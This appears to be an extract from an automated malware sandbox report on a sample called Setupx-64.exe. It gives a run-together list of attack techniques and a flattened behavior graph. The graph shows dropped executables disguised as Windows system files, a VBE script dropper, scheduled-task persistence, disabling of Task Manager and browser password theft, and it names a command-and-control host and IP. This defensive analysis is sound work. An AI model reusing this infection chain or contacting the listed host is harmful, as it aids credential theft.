            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1663901 Sample: Setupx-64.exe Startdate: 12/04/2025 Architecture: WINDOWS Score: 100 57 a1114171.xsph.ru 2->57 59 pki-goog.l.google.com 2->59 61 c.pki.goog 2->61 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for dropped file 2->69 71 8 other signatures 2->71 10 Setupx-64.exe 3 6 2->10         started        13 fontdrvhost.exe 2->13         started        16 RZctPlhC2XmeDKsE7v.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 file5 51 C:\...\Blockruntime.exe, PE32 10->51 dropped 53 C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe, data 10->53 dropped 20 wscript.exe 1 10->20         started        87 Antivirus detection for dropped file 13->87 89 Multi AV Scanner detection for dropped file 13->89 signatures6 process7 signatures8 73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->73 23 cmd.exe 1 20->23         started        process9 process10 25 Blockruntime.exe 1 14 23->25         started        29 reg.exe 23->29         started        31 conhost.exe 23->31         started        file11 43 C:\Windows\Speech\...\RuntimeBroker.exe, PE32 25->43 dropped 45 C:\Windows\...\StartMenuExperienceHost.exe, PE32 25->45 dropped 47 C:\Recovery\fontdrvhost.exe, PE32 25->47 dropped 49 2 other malicious files 25->49 dropped 75 Antivirus detection for dropped file 25->75 77 Multi AV Scanner detection for dropped file 25->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 25->79 81 Creates processes via WMI 25->81 33 upfc.exe 14 632 25->33         started        37 schtasks.exe 25->37         started        39 schtasks.exe 25->39         started        41 13 other processes 25->41 83 Disable Task Manager(disabletaskmgr) 29->83 85 Disables the Windows task manager (taskmgr) 29->85 signatures12 process13 dnsIp14 55 a1114171.xsph.ru 141.8.192.84, 49692, 49693, 49694 SPRINTHOSTRU Russian Federation 33->55 63 Tries to harvest and steal browser information (history, passwords, etc) 33->63 signatures15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.